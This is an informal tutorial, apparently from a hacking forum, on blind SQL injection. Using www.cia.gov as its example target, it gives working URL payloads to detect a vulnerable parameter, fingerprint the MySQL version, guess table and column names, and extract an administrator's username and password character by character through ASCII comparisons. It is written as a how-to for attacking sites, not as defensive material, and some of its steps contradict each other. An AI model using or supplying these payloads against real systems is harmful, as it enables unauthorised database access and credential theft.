blind sql injection
if you dont know about mysql injection turn around and learn it b4 u even consider learning this
because this is a whole different story.
1. test for vulnerability
so you have a site lets say :
Code:
www.cia.gov/news.php?id=1
but for blind you put
Code:
www.cia.gov/news.php?id=1 and 1=2
or an error message like invalid id or db_error select * from xxxx@localhost call line "/" or anything like that
then its vuln
this works
because 1=2 is always false
you see if it was
Code:
www.cia.gov/index.php?id=1 and 1=1
because 1=1 is always true
2. mysql version
to find mysql version you need to do this query
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=4
if not then try
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=5
3. fuzzing tables and columns
to find the table name you need to guess it
so...
here is the query
Code:
www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1
eg. the table name is administrator
and we try
Code:
(SELECT 1 from users limit 0,1)=1
but if we did
Code:
(SELECT 1 from administrator limit 0,1)=1
now for the column
so the table is administrator
and we found that by fuzzing
now we need the column name
we fuzz it by
Code:
www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1
you get my drift...
4. extracting password with ascii
so now we have the table/column we need to extract
well as you know it wont just pop up on the screen
we will need to use the ancii char
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
now try
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>101
so its greater than 99 but not greater than 101
higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
so its greater than 99 but not greater than 100 making it 100
the first character of the password is 100 which if u put into an ascii converter you will see
that it is the letter d
now you need to find the next character
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>60
so this will be doing the second character
so keep extracting characters untill u get an error
then u will have the hash / password
Sketch- out
a good ascii coneverter can be found at
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
Categories:
sql injection